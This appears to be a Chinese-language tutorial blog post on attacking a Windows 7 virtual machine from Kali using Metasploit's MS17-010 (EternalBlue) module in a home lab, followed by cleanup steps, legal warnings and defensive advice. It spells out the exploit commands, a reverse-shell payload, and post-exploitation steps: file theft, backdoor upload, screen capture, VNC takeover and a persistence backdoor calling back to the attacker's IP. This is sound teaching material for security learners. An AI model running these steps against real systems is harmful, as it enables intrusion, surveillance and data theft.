通过Kali渗透攻击Win7（x64）主机

通过Kali运用MS17-010（永恒之蓝）漏洞渗透攻击Win7（x64）主机

首先下载Kali系统并安装

打开Kali官网，下载适合虚拟机运行的版本，下载成功后解压。随后在VM虚拟机中通过上方文件选项栏打开刚解压后得到的文件夹里面的大小约几kB的文件，接着弹出登录界面，用户名与密码都是“kali”。

创建操作系统为Win7（x64）的虚拟机

打开https://msdn.itellyou.cn/

下载上方红框标注的文件，然后打开VM，把虚拟机安装进来。
安装完毕后，点击左下角开始选项（经典Windows小窗户），点击“所有程序”，找到“附件”并点击，然后右键“命令提示符”，选择“管理员身份运行”，随后输入代码

netsh advfirewall set allprofiles state off

关闭Windows防火墙。接着输入代码

ipconfig

一般IPv4地址后就是该靶机的ip地址，我们这里要记住它。

接着用Kali渗透攻击

左上角第六个选项右边有个下拉箭头，如上图，点开它后再点击“PowerShell”弹出终端页面。输入代码

sudo su

接着输入密码“kali”并回车，这样我们成功登录管理员账号。接着输入代码

msfconsole

进入msf软件。接着输入代码

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.0（这里填你自己靶机的ip）
set payload windows/x64/meterpreter/reverse_tcp
run

随后等待一段时间，待命令行最前方出现“meterpreter”后就代表我们渗透成功了。此时可以输入

shell

这样我们的终端现在就是靶机的终端了！可以输入

start explorer https://www.baidu.com

回车后你会发现，靶机打开了百度的页面。

总结：从环境搭建到实战渗透：MS17-010 漏洞利用全记录

在前文中，我们完成了 Kali Linux 与 Win7 靶机的环境搭建，并通过 Metasploit 框架成功利用 MS17-010（永恒之蓝）漏洞实现了对靶机的渗透。接下来，我们将深入探索渗透后的操作空间，以及渗透测试的收尾与反思，让整个实战过程更加完整。

一、渗透成功后：靶机控制权的深度挖掘

当终端显示meterpreter >时，意味着我们已获得靶机的 meterpreter 会话 —— 这是一个功能强大的控制接口，远不止于打开浏览器。以下是几个实用操作，帮助你理解渗透后的权限边界：

• 信息收集：摸清靶机 "底细"

查看靶机系统信息：

meterpreter
sysinfo  # 显示操作系统版本、架构、补丁状态等

通过此命令可确认靶机是否为漏洞影响范围内的系统（如未打 MS17-010 补丁的 Win7 x64），验证漏洞利用的前提条件是否成立。
查看当前登录用户：

meterpreter
getuid  # 显示当前会话的用户权限（如是否为管理员）
users   # 列出所有登录过的用户

若显示NT AUTHORITYSYSTEM，则意味着获得了系统最高权限，可执行任意操作。

• 文件操作：获取敏感数据

下载靶机文件到本地（Kali）：

meterpreter
download C:\Users\Administrator\Desktop\secret.txt /root/  # 将靶机桌面的secret.txt下载到Kali的/root目录

此操作可用于获取靶机中的文档、图片等敏感文件，模拟攻击者窃取数据的过程。
上传文件到靶机：

meterpreter
upload /root/test.exe C:\Users\Public\  # 将Kali中的test.exe上传到靶机的公共目录

可用于上传恶意程序（如后门），实现对靶机的长期控制。

• 屏幕监控与控制：实时掌握靶机动态

截取靶机屏幕：

meterpreter
screenshot  # 自动截取当前屏幕并保存到Kali本地

若靶机处于使用状态，可通过此命令监控用户操作（需注意：未经授权的监控涉嫌违法）。
远程桌面控制：

meterpreter
run vnc  # 启动VNC服务，通过VNC viewer连接靶机桌面

直接接管靶机鼠标和键盘，如同操作本地电脑一般控制靶机。

• 持久化控制：让权限 "常驻"

渗透测试的核心目标之一是验证系统的长期安全性。若仅通过一次漏洞获得权限，重启后可能失效，因此需要 "持久化" 操作：

meterpreter
run persistence -X -i 5 -p 4444 -r 192.168.0.100  # 开机自启动后门，每5秒连接Kali的4444端口

执行后，即使靶机重启，Kali 仍能通过msfconsole重新连接会话。

二、测试收尾：清理痕迹与环境还原

渗透测试的伦理与合规性至关重要。完成测试后，需清理操作痕迹，避免对靶机造成永久影响：

meterpreter
exit  # 关闭当前会话

若需彻底结束渗透，在 MSF 控制台中输入：

msfconsole
exit  # 退出Metasploit框架

• 恢复靶机状态

重新开启 Windows 防火墙（避免靶机暴露风险）：
在靶机的管理员命令提示符中输入：

netsh advfirewall set allprofiles state on

卸载持久化后门（若已配置）：
通过 meterpreter 会话删除启动项中的恶意程序，或直接重置靶机快照（虚拟机环境推荐）。

• 整理测试报告

将测试过程中的关键信息记录归档，包括：

靶机 IP、系统版本、漏洞细节；
利用的工具（MSF 框架、漏洞模块）；
获得的权限及操作记录；
修复建议（如安装对应补丁：MS17-010 补丁下载）。

三、实战反思：漏洞利用的前提与风险

环境合法性：
本次测试基于本地虚拟机环境，所有操作均在授权范围内。未经授权的渗透测试属于违法行为，可能面临刑事处罚。实际测试需获得明确书面授权，严格遵守《网络安全法》等法律法规。
漏洞的时效性：
MS17-010 漏洞发布于 2017 年，微软早已推出补丁，但至今仍有部分老旧系统未更新。这提醒我们：及时打补丁是防范已知漏洞的最有效手段。
防御建议：
定期更新系统补丁，关闭不必要的端口（如 SMB 服务使用的 445 端口）；
启用防火墙，限制内网与外网的不必要通信；
部署入侵检测系统（IDS），监控异常网络流量（如永恒之蓝的漏洞探测特征）。

四、扩展学习：从漏洞利用到安全防御

本次实战仅为漏洞利用的入门案例。若想深入网络安全领域，可进一步学习：

漏洞原理：研究 MS17-010 漏洞的技术细节（如 SMB 协议缺陷、缓冲区溢出原理）；
防御技术：学习如何通过日志分析发现渗透痕迹，或使用漏洞扫描工具（如 Nessus）提前检测系统弱点；
红队思维：了解攻击者的常用手段，从 "被攻击" 的角度反推防御策略。

通过本次从环境搭建到实战渗透的全过程，我们不仅掌握了具体漏洞的利用方法，更应意识到：网络安全的核心是 "攻防对抗"，而合规、合法的测试是提升系统安全性的重要手段。希望本文能为你的网络安全学习之路提供一点实践参考。